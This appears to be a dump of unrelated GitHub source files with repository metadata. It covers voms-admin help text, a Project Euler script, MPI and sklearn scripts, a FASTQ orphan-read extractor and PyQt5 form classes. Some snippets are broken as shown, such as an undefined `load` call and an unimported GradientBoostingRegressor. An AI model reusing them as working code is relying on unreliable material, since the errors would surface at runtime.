'/C=IT/ST=Test/CN=user0/Email=andrea.ceccanti@cnaf.infn.it' '/C=IT/ST=Test/L=Bologna/O=Voms-Admin/OU=Voms-Admin testing/CN=Test CA'
</help-string>
<arg type="User"/>
<arg type="User"/>
</command>
<command
name="remove-certificate">
<description>remove-certificate USER</description>
<help-string xml:space="preserve">
Unbinds a certificate from an existing VO user.
This operation takes either a pem certificate as argument, or,
if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid remove-certificate my-cert.pem
voms-admin --vo infngrid --nousercert remove-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA'
</help-string>
<arg type="User"/>
</command>
<command
name="suspend-certificate">
<description>suspend-certificate USER REASON</description>
<help-string xml:space="preserve">
Suspends a user certificate, and specifies a reason for the suspension.
This operation takes, for the first argument, either a pem certificate as argument, or,
if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid suspend-certificate usercert.pem 'Security incident!'
voms-admin --vo infngrid --nousercert suspend-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA' \\
'Security incident!'
</help-string>
<arg type="User"/>
<arg type="String"/>
</command>
<command
name="restore-certificate">
<description>restore-certificate USER</description>
<help-string xml:space="preserve">
Restores a user certificate.
This operation takes, for the first argument, either a pem certificate as argument, or,
if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid restore-certificate usercert.pem
voms-admin --vo infngrid --nousercert restore-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA'
</help-string>
<arg type="User"/>
</command>
<command
name="get-certificates">
<description>get-certificates USER</description>
<help-string xml:space="preserve">
Lists the certificates associated to a user.
This operation takes either a pem certificate as argument, or, if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid get-certificates usercert.pem
voms-admin --vo infngrid --nousercert get-certificates \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA'
</help-string>
<arg
type="User"/>
</command>
</command-group>
</voms-commands>""" | [
"andrea.ceccanti@cnaf.infn.it"
] | andrea.ceccanti@cnaf.infn.it |
c3b059e438f71cbc363cd9ce306bf96bc1084330 | 13897046cd98718d039fdad235d57683b7a4ee5c | /P022.py | 1bddffd44b2bbbe020ebc953bea542108abd9d4e | [] | no_license | sana-malik/ProjectEuler | 1cb7431337bd623b5f5db2b8f17eccc1509a3659 | 3ee2ff258c75c9dbe6ae17b3032fa6c2b3d7e304 | refs/heads/master | 2020-04-22T17:11:23.757241 | 2012-12-14T00:41:04 | 2012-12-14T00:41:04 | 7,157,851 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | #! /usr/bin/python
def score(name):
return sum(map(lambda n : ord(n)-ord('A')+1, name))
file = open('names.txt')
names = sorted(file.read().replace('"','').split(','))
file.close()
totalScore = 0
for i, name in enumerate(names):
totalScore += (i+1)*score(name)
print totalScore
print 938*score('COLIN') | [
"heyletsdance@gmail.com"
] | heyletsdance@gmail.com |
94f8e95745e1bf0135136f7bd87f20138e0cd719 | a05a42885c54d19456d0bc296836253eed9ab6ad | /errRobust/prep.py | d2993d18b9226be60be3688e4a3bbcbe6eb4c26a | [] | no_license | congzlwag/BornMachineTomo | b26d9cf4f90b1d015992864db05e14ff59479254 | 64b3286f5453763216b860f89961900269b8caff | refs/heads/master | 2022-03-29T15:03:49.176583 | 2020-01-05T21:02:12 | 2020-01-05T21:02:12 | 134,438,390 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 651 | py | from mpi4py import MPI
import sys
sys.path.append('../')
from CS6 import ProjMeasureSet, MPS
import numpy as np
import os
measout_dir = './'
if __name__ == '__main__':
typ = sys.argv[1]
space_size = int(sys.argv[2])
nss = load('elist.npy')
comm = MPI.COMM_WORLD
rk = comm.Get_rank()
np.random.seed(rk)
mxBatch = 2000
batch_size = 40
sm = MPS(space_size, typ)
sm.leftCano()
for ns in nss:
ds = ProjMeasureSet(space_size, mxBatch*batch_size, mps=sm, noise=ns)
measout = './%s/%d/%g/'%(typ, space_size, ns)
try:
os.makedirs(measout)
except FileExistsError:
pass
ds.save(measout+"R%dSet"%rk)
| [
"congzlwag@163.com"
] | congzlwag@163.com |
ceb2238237480ba980b5de0c949bd5db65cf0aef | eb348caf75cad81f9be41b73e9fe44f81ea75b7a | /app/server.py | 24b57f899bd62d9b887e439506937d992a644fdf | [] | no_license | MertIV/gpu_price | e0cc113678e70629154eccab24ddcd4a4aea016e | 031dd02a8c828a723745897cd19aac12d9ac4f00 | refs/heads/master | 2023-08-22T08:54:12.913696 | 2021-09-27T20:41:05 | 2021-09-27T20:41:05 | 408,991,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | from concurrent import futures
import grpc
from app.generated import echo_pb2_grpc
from app.echoer import Echoer
class Server:
@staticmethod
def run():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
echo_pb2_grpc.add_EchoServicer_to_server(Echoer(), server)
server.add_insecure_port('[::]:50051')
server.start()
server.wait_for_termination()
| [
"mrtkrt96@gmail.com"
] | mrtkrt96@gmail.com |
7ea4348e0388b427adcc0d1d2c31b06df0550e19 | 023acc1445ebde3e9fe4318fcfd60908c91d74d5 | /sli/train.py | 77fdce51b077a71a4dc73a1c298f924c963fc9d0 | [] | no_license | counterfactuals/sensible-local-interpretations | 99d22df59a6f07b6135762eec57c29e80dac9cdf | ab7af07299ea2ec1a1be28e0bf38f4947321d04c | refs/heads/master | 2022-03-12T11:30:19.296104 | 2019-12-02T20:31:27 | 2019-12-02T20:31:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | from copy import deepcopy
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, GradientBoostingClassifier
from sklearn.tree import export_graphviz, DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.tree import plot_tree
from sampling import resample
def train_models(X: np.ndarray, y: np.ndarray,
class_weights: list=[0.5, 1.0, 2.0], model_type: str='logistic'):
'''
Params
------
class_weights
Weights to weight the positive class, one for each model to be trained
'''
assert np.unique(y).size == 2, 'Task must be binary classification!'
models = []
for class_weight in class_weights:
if model_type == 'logistic':
m = LogisticRegression(solver='lbfgs', class_weight={0: 1, 1: class_weight})
elif model_type == 'mlp2':
m = MLPClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
elif model_type == 'rf':
m = RandomForestClassifier(class_weight={0: 1, 1: class_weight})
elif model_type == 'gb':
m = GradientBoostingClassifier()
X, y = resample(X, y, sample_type='over', class_weight=class_weight)
m.fit(X, y)
models.append(deepcopy(m))
return models
def regress(X: np.ndarray, y: np.ndarray, model_type: str='linear'):
if model_type == 'linear':
m = LinearRegression()
elif model_type == 'mlp2':
m = MLPRegressor()
elif model_type == 'rf':
m = RandomForestRegressor()
elif model_type == 'gb':
m = GradientBoostingRegressor()
m.fit(X, y)
return m
| [
"chandan_singh@berkeley.edu"
] | chandan_singh@berkeley.edu |
56952f1c885d10b87a2294e359c3c70e9b306700 | c241e9d8c47913f49372f3070c928c947dc1b890 | /biobakery_workflows/scripts/extract_orphan_reads.py | 4f288d34469d9ab13c0f56c20f2f5689165d797d | [
"MIT"
] | permissive | shbrief/biobakery_workflows | b29b311b1a484aee039ea3f36a3852378e86aeeb | 2037f45caa8e4af9a40b5c1d2886cde15bc00381 | refs/heads/master | 2023-01-02T11:53:23.006687 | 2020-10-26T14:07:35 | 2020-10-26T14:07:35 | 291,796,194 | 0 | 0 | NOASSERTION | 2020-08-31T18:40:41 | 2020-08-31T18:40:41 | null | UTF-8 | Python | false | false | 3,207 | py | #!/usr/bin/env python
# Given a raw interleaved fastq file and a balanced interleaved fastq (containing no orpahns)
# generate the read ID lists necessary to extract all orphans from the original file.
#
# Makes use of the seqtk utility
import argparse
import os
import subprocess
def parse_cli_arguments():
"""
"""
parser = argparse.ArgumentParser('Extracts orphan reads from a interleaved sequence file '
'and produces an orphan sequence file.')
parser.add_argument('-r', '--raw-sequence', required=True,
help='The raw interleaved sequence file.')
parser.add_argument('-b', '--balanced-sequence', required=True,
help='Balanced sequence file with no orphan sequences.')
parser.add_argument('-o', '--output-dir', required=True,
help='Output directory to write orphan sequence files too.')
return parser.parse_args()
def get_ids_from_sequences(sample_name, raw_seq, balanced_seq, out_dir):
"""
Extracts raw, balanced and orphan sequence IDs from the provided
sequence files.
"""
raw_ids = os.path.join(out_dir, "%s.raw_ids.txt" % sample_name)
balanced_ids = os.path.join(out_dir, "%s.matched_ids.txt" % sample_name)
orphan_ids = os.path.join(out_dir, "%s.orphan_ids.txt" % sample_name)
for (input_seq, output_ids) in [(raw_seq, raw_ids), (balanced_seq, balanced_ids)]:
with open(output_ids, 'wb') as out_ids:
ps_grep = subprocess.Popen(['grep', '-e', '^@.*/[1|2]$', input_seq], stdout=subprocess.PIPE)
ps_sed = subprocess.Popen(['sed', '-e', 's/^@//'], stdin=ps_grep.stdout, stdout=subprocess.PIPE)
ps_grep.stdout.close()
ps_sort = subprocess.Popen(['sort'], stdin=ps_sed.stdout, stdout=out_ids)
ps_sed.stdout.close()
ps_sort.communicate()
with open(orphan_ids, 'wb') as orphan_ids_out:
p = subprocess.Popen(['comm', '-23', raw_ids, balanced_ids], stdout=orphan_ids_out)
p.communicate()
return (raw_ids, balanced_ids, orphan_ids)
def generate_orphan_sequences(sample_name, raw_seqs, orphan_ids, out_dir):
"""
Generates an orphan sequence file from the supplied interleaved sequence file.
"""
orphan_seqs_file = os.path.join(out_dir, "%s_orphans.fastq" % sample_name)
with open(orphan_seqs_file, 'wb') as orphan_seqs:
p = subprocess.Popen(['seqtk', 'subseq', raw_seqs, orphan_ids], stdout=orphan_seqs)
p.communicate()
def main(args):
sample_name = os.path.basename(args.raw_sequence).split(os.extsep, 1)[0]
(raw_ids, balanced_ids, orphan_ids) = get_ids_from_sequences(sample_name,
args.raw_sequence,
args.balanced_sequence,
args.output_dir)
generate_orphan_sequences(sample_name, args.raw_sequence, orphan_ids, args.output_dir)
os.remove(raw_ids)
os.remove(balanced_ids)
os.remove(orphan_ids)
if __name__ == "__main__":
main(parse_cli_arguments())
| [
"437074+carze@users.noreply.github.com"
] | 437074+carze@users.noreply.github.com |
2614cf22a662a20980fc2c5a1e7cfee9b8c8d154 | f6ff3146b8058e213155d5903eb793d2a1c1ec97 | /virtual/bin/wheel | e0236dc65639bacd883c3a627892db671def4745 | [
"MIT"
] | permissive | Bernicetwili/Personal-Gallery | c8695e54ee801768bebd071fa8d29b07f87c7984 | 15f5e018cee67abe97d47604137470ce205961fb | refs/heads/master | 2023-04-21T18:41:07.063828 | 2021-05-20T18:40:17 | 2021-05-20T18:40:17 | 368,862,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | #!/home/moringaschool/Desktop/Personal-Gallery/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"bernicetwili0@gmail.com"
] | bernicetwili0@gmail.com | |
aad2618c35e6a18f8a73c82f034e86cb71cf7e0a | c1ddae2b80a644162032971fe7b46c42eefcf8a2 | /evalunl/__openerp__.py | 62a52832ce6a173e464f7bbf08881414e48d2945 | [] | no_license | miltonlab/curso-openerp | f5e0daff2eff79e7cf46051bf0b89a31509c9b68 | 8408c02b3b6533f0ec74077b9f2d91e6ef90afe2 | refs/heads/master | 2016-09-01T18:04:31.995959 | 2013-05-09T05:09:57 | 2013-05-09T05:09:57 | 9,855,085 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | {
'name' : 'evaluacionunl2013',
'version' : '1.0',
'author' : 'DDS-UNL',
'decription' : 'Presentacion de Indicadores para Evaluacion 2013',
'category' : 'Frontal',
'website' : 'http://dds.unl.edu.ec',
'depends' : ['base'],
'data' : [ ],
'demo' : ['demo', 'demo.xml']
}
| [
"miltonlab@ubuntuserver.(none)"
] | miltonlab@ubuntuserver.(none) |
d7ebd8e83312c140e3e17d3997dc25a05d8fc343 | 23ec5dc502e0437c6a23aa783e01f7a9d32f5df0 | /magicwand/AI/AI_form0225/gui/form.py | dec81337e09b40d39eca8a193dd6cf940ba3b768 | [] | no_license | jinu0124/AI_Learning_Tool | 1a33b9a99ca0518af11c77b94c3a8d63b9aa88c2 | 91ba9b2eda4b82db35ed8b50d4b1468e23a3d993 | refs/heads/master | 2023-04-03T09:57:00.737744 | 2020-02-25T23:57:12 | 2020-02-25T23:57:12 | 242,937,653 | 0 | 0 | null | 2023-03-24T22:17:04 | 2020-02-25T07:30:38 | Jupyter Notebook | UTF-8 | Python | false | false | 24,617 | py | from PyQt5 import QtCore, QtWidgets
class Ui_Validation(object):
# validation Check
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(447, 136)
self.pushButton_3 = QtWidgets.QPushButton(Form)
self.pushButton_3.setGeometry(QtCore.QRect(390, 20, 81, 23))
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_2 = QtWidgets.QPushButton(Form)
self.pushButton_2.setGeometry(QtCore.QRect(315, 20, 71, 23))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_1 = QtWidgets.QPushButton(Form)
self.pushButton_1.setGeometry(QtCore.QRect(235, 20, 76, 23))
self.pushButton_1.setObjectName("pushButton_1")
self.pushButton_0 = QtWidgets.QPushButton(Form)
self.pushButton_0.setGeometry(QtCore.QRect(155, 20, 76, 23))
self.pushButton_0.setObjectName("pushButton_0")
self.label_8 = QtWidgets.QLabel(Form)
self.label_8.setGeometry(QtCore.QRect(30, 20, 125, 21))
self.label_8.setObjectName("label_8")
self.listWidget_8 = QtWidgets.QListWidget(Form)
self.listWidget_8.setGeometry(QtCore.QRect(20, 50, 450, 125))
self.listWidget_8.setObjectName("listView_4")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family : Arial')
self.pushButton_3.setText(_translate("Form", "Val Start"))
self.pushButton_2.setText(_translate("Form", "Val Config"))
self.pushButton_1.setText(_translate("Form", "Load Weight"))
self.pushButton_0.setText(_translate("Form", "Load Image"))
self.label_8.setText(_translate("Form", "Validation Ready"))
class Ui_Val(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(341, 364)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setGeometry(QtCore.QRect(80, 320, 171, 31))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.label = QtWidgets.QLabel(Dialog)
self.label.setGeometry(QtCore.QRect(20, 20, 61, 21))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(20, 60, 61, 21))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(20, 100, 115, 21))
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(Dialog)
self.label_4.setGeometry(QtCore.QRect(20, 140, 91, 21))
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(Dialog)
self.label_5.setGeometry(QtCore.QRect(20, 180, 91, 21))
self.label_5.setObjectName("label_5")
self.textEdit = QtWidgets.QTextEdit(Dialog)
self.textEdit.setGeometry(QtCore.QRect(20, 210, 90, 21))
self.textEdit.setObjectName("textEdit")
self.label_6 = QtWidgets.QLabel(Dialog)
self.label_6.setGeometry(QtCore.QRect(20, 280, 91, 21))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(Dialog)
self.label_7.setGeometry(QtCore.QRect(210, 60, 91, 21))
self.label_7.setObjectName("label_7")
self.checkBox = QtWidgets.QCheckBox(Dialog)
self.checkBox.setGeometry(QtCore.QRect(180, 20, 61, 21))
self.checkBox.setObjectName("radioButton")
self.checkBox_2 = QtWidgets.QCheckBox(Dialog)
self.checkBox_2.setGeometry(QtCore.QRect(250, 20, 61, 21))
self.checkBox_2.setObjectName("radioButton_2")
self.spinBox = QtWidgets.QSpinBox(Dialog)
self.spinBox.setGeometry(QtCore.QRect(220, 100, 42, 22))
self.spinBox.setObjectName("spinBox")
self.checkBox_3 = QtWidgets.QCheckBox(Dialog)
self.checkBox_3.setGeometry(QtCore.QRect(250, 140, 81, 21))
self.checkBox_3.setObjectName("radioButton_3")
self.checkBox_4 = QtWidgets.QCheckBox(Dialog)
self.checkBox_4.setGeometry(QtCore.QRect(160, 140, 81, 21))
self.checkBox_4.setObjectName("radioButton_4")
self.listWidget = QtWidgets.QListWidget(Dialog)
self.listWidget.setGeometry(QtCore.QRect(150, 180, 181, 71))
self.listWidget.setObjectName("listWidget")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(210, 280, 75, 23))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(113, 198, 36, 21))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(Dialog)
self.pushButton_3.setGeometry(QtCore.QRect(113, 222, 36, 21))
self.pushButton_3.setObjectName("pushButton_3")
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
Dialog.setStyleSheet('font-family : Arial')
self.label.setText(_translate("Dialog", "USE"))
self.label_2.setText(_translate("Dialog", "MODE"))
self.label_3.setText(_translate("Dialog", "Detection Rate (%)"))
self.label_4.setText(_translate("Dialog", "Backbone"))
self.label_5.setText(_translate("Dialog", "Class Label"))
self.label_6.setText(_translate("Dialog", "Color Splash"))
self.label_7.setText(_translate("Dialog", "\'Inference\'"))
self.checkBox.setText(_translate("Dialog", "CPU"))
self.checkBox_2.setText(_translate("Dialog", "GPU"))
self.checkBox_3.setText(_translate("Dialog", "Resnet 101"))
self.checkBox_4.setText(_translate("Dialog", "Resnet 50"))
self.pushButton.setText(_translate("Dialog", "ON"))
self.pushButton_2.setText(_translate("Dialog", "Add"))
self.pushButton_3.setText(_translate("Dialog", "Del"))
class Ui_Show_All(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(1030, 684)
self.textBrowser = QtWidgets.QTextBrowser(Dialog)
self.textBrowser.setGeometry(QtCore.QRect(10, 10, 1011, 662))
self.textBrowser.setObjectName("textBrowser")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "View Loss"))
Dialog.setStyleSheet('font-family : Arial')
# self.textBrowser.setText(_translate("Dialog", "TRAINING LOSS"))
class Ui_Show(object):
# validation Check
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(447, 136)
self.pushButton = QtWidgets.QPushButton(Form)
self.pushButton.setGeometry(QtCore.QRect(440, 21, 80, 23))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Form)
self.pushButton_2.setGeometry(QtCore.QRect(350, 21, 86, 23))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(Form)
self.pushButton_3.setGeometry(QtCore.QRect(255, 21, 91, 23))
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_4 = QtWidgets.QPushButton(Form)
self.pushButton_4.setGeometry(QtCore.QRect(440, 0, 80, 20))
self.pushButton_4.setObjectName("pushButton_4")
self.pushButton_5 = QtWidgets.QPushButton(Form)
self.pushButton_5.setGeometry(QtCore.QRect(255, 0, 91, 20))
self.pushButton_5.setObjectName("pushButton_5")
self.pushButton_6 = QtWidgets.QPushButton(Form)
self.pushButton_6.setGeometry(QtCore.QRect(350, 0, 86, 20))
self.pushButton_6.setObjectName("pushButton_6")
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(30, 20, 80, 21))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(110, 20, 45, 21))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(30, 0, 120, 19))
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(20, 218, 100, 19))
self.label_4.setObjectName("label_4")
self.listWidget = QtWidgets.QListWidget(Form)
self.listWidget.setGeometry(QtCore.QRect(20, 50, 500, 165))
self.listWidget.setObjectName("listView")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family : Arial')
self.pushButton.setText(_translate("Form", "Show All"))
self.pushButton_2.setText(_translate("Form", "Mode Change"))
self.pushButton_3.setText(_translate("Form", "Stop Training"))
self.pushButton_4.setText(_translate("Form", "Clear"))
self.pushButton_5.setText(_translate("Form", "Cancel Stop"))
self.pushButton_6.setText(_translate("Form", "Pause Train"))
self.label.setText(_translate("Form", "Show Box"))
class Ui_Train(object):
# training Check
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(448, 157)
self.pushButton_3 = QtWidgets.QPushButton(Form)
self.pushButton_3.setGeometry(QtCore.QRect(390, 20, 81, 23))
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_4 = QtWidgets.QPushButton(Form)
self.pushButton_4.setGeometry(QtCore.QRect(305, 20, 81, 23))
self.pushButton_4.setObjectName("pushButton_4")
self.pushButton_5 = QtWidgets.QPushButton(Form)
self.pushButton_5.setGeometry(QtCore.QRect(220, 20, 81, 23))
self.pushButton_5.setObjectName("pushButton_5")
self.label_8 = QtWidgets.QLabel(Form)
self.label_8.setGeometry(QtCore.QRect(30, 20, 181, 21))
self.label_8.setObjectName("label_8")
self.listWidget = QtWidgets.QListWidget(Form)
self.listWidget.setGeometry(QtCore.QRect(20, 50, 450, 91))
self.listWidget.setObjectName("listWidget")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family : Arial')
self.pushButton_3.setText(_translate("Form", "Train Start"))
self.pushButton_4.setText(_translate("Form", "Show Tensor"))
self.pushButton_5.setText(_translate("Form", "close Tensor"))
self.label_8.setText(_translate("Form", "Train Ready Box"))
class Ui_Json(object):
# json file list
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(294, 190)
self.listView_3 = QtWidgets.QListView(Form)
self.listView_3.setGeometry(QtCore.QRect(10, 45, 261, 140))
self.listView_3.setObjectName("listView_3")
self.label_4 = QtWidgets.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(10, 10, 101, 31))
self.label_4.setObjectName("label_4")
self.pushButton_5 = QtWidgets.QPushButton(Form)
self.pushButton_5.setGeometry(QtCore.QRect(180, 10, 91, 21))
self.pushButton_5.setObjectName("pushButton_5")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family : Arial')
self.label_4.setText(_translate("Form", "JSON File"))
self.pushButton_5.setText(_translate("Form", "Import JSON"))
class Ui_Data(object):
# image file list
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(295, 220)
self.pushButton_4 = QtWidgets.QPushButton(Form)
self.pushButton_4.setGeometry(QtCore.QRect(180, 20, 91, 21))
self.pushButton_4.setObjectName("pushButton_4")
self.listView_2 = QtWidgets.QListView(Form)
self.listView_2.setGeometry(QtCore.QRect(10, 50, 261, 151))
self.listView_2.setObjectName("listView_2")
self.label_3 = QtWidgets.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(10, 20, 91, 21))
self.label_3.setObjectName("label_3")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
Form.setStyleSheet('font-family : Arial')
self.pushButton_4.setText(_translate("Form", "Import Image"))
self.label_3.setText(_translate("Form", "Image File"))
class Ui_ConfigOpt(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(349, 440)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setGeometry(QtCore.QRect(80, 400, 171, 32))
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.label = QtWidgets.QLabel(Dialog)
self.label.setGeometry(QtCore.QRect(110, 10, 131, 21))
self.label.setObjectName("label")
self.lineEdit = QtWidgets.QLineEdit(Dialog)
self.lineEdit.setGeometry(QtCore.QRect(250, 100, 81, 21))
self.lineEdit.setText("")
self.lineEdit.setObjectName("lineEdit")
self.spinBox = QtWidgets.QSpinBox(Dialog)
self.spinBox.setGeometry(QtCore.QRect(260, 40, 71, 22))
self.spinBox.setObjectName("spinBox")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setGeometry(QtCore.QRect(10, 40, 131, 21))
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(Dialog)
self.label_3.setGeometry(QtCore.QRect(10, 70, 131, 21))
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(Dialog)
self.label_4.setGeometry(QtCore.QRect(10, 100, 131, 21))
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(Dialog)
self.label_5.setGeometry(QtCore.QRect(10, 190, 131, 21))
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(Dialog)
self.label_6.setGeometry(QtCore.QRect(10, 160, 131, 21))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(Dialog)
self.label_7.setGeometry(QtCore.QRect(10, 220, 131, 21))
self.label_7.setObjectName("label_7")
self.label_8 = QtWidgets.QLabel(Dialog)
self.label_8.setGeometry(QtCore.QRect(10, 130, 131, 21))
self.label_8.setObjectName("label_8")
self.checkBox = QtWidgets.QCheckBox(Dialog)
self.checkBox.setGeometry(QtCore.QRect(170, 130, 81, 21))
self.checkBox.setObjectName("checkBox")
self.checkBox_2 = QtWidgets.QCheckBox(Dialog)
self.checkBox_2.setGeometry(QtCore.QRect(260, 130, 81, 21))
self.checkBox_2.setObjectName("checkBox_2")
self.checkBox_3 = QtWidgets.QCheckBox(Dialog)
self.checkBox_3.setGeometry(QtCore.QRect(260, 160, 81, 21))
self.checkBox_3.setObjectName("checkBox_3")
self.checkBox_4 = QtWidgets.QCheckBox(Dialog)
self.checkBox_4.setGeometry(QtCore.QRect(170, 160, 81, 21))
self.checkBox_4.setObjectName("checkBox_4")
self.spinBox_3 = QtWidgets.QSpinBox(Dialog)
self.spinBox_3.setGeometry(QtCore.QRect(280, 190, 42, 22))
self.spinBox_3.setObjectName("spinBox_3")
self.spinBox_4 = QtWidgets.QSpinBox(Dialog)
self.spinBox_4.setGeometry(QtCore.QRect(280, 220, 42, 22))
self.spinBox_4.setObjectName("spinBox_4")
self.label_11 = QtWidgets.QLabel(Dialog)
self.label_11.setGeometry(QtCore.QRect(10, 250, 100, 21))
self.label_11.setObjectName("label_11")
self.spinBox_5 = QtWidgets.QSpinBox(Dialog)
self.spinBox_5.setGeometry(QtCore.QRect(260, 250, 62, 22))
self.spinBox_5.setObjectName("spinBox_5")
self.listWidget = QtWidgets.QListWidget(Dialog)
self.listWidget.setGeometry(QtCore.QRect(250, 70, 81, 21))
self.listWidget.setObjectName("listView")
self.label_9 = QtWidgets.QLabel(Dialog)
self.label_9.setGeometry(QtCore.QRect(10, 280, 131, 21))
self.label_9.setObjectName("label_9")
self.pushButton = QtWidgets.QPushButton(Dialog)
self.pushButton.setGeometry(QtCore.QRect(280, 280, 35, 21))
self.pushButton.setObjectName("pushButton")
self.label_10 = QtWidgets.QLabel(Dialog)
self.label_10.setGeometry(QtCore.QRect(10, 310, 100, 21))
self.label_10.setObjectName("label_10")
self.comboBox = QtWidgets.QComboBox(Dialog)
self.comboBox.setGeometry(QtCore.QRect(260, 310, 65, 22))
self.comboBox.setObjectName("comboBox")
self.label_12 = QtWidgets.QLabel(Dialog)
self.label_12.setGeometry(QtCore.QRect(10, 340, 110, 21))
self.label_12.setObjectName("label_12")
self.horizontalSlider_2 = QtWidgets.QSlider(Dialog)
self.horizontalSlider_2.setGeometry(QtCore.QRect(125, 340, 200, 30))
self.horizontalSlider_2.setOrientation(QtCore.Qt.Horizontal)
self.horizontalSlider_2.setRange(20, 100) # 범위 (min, max)
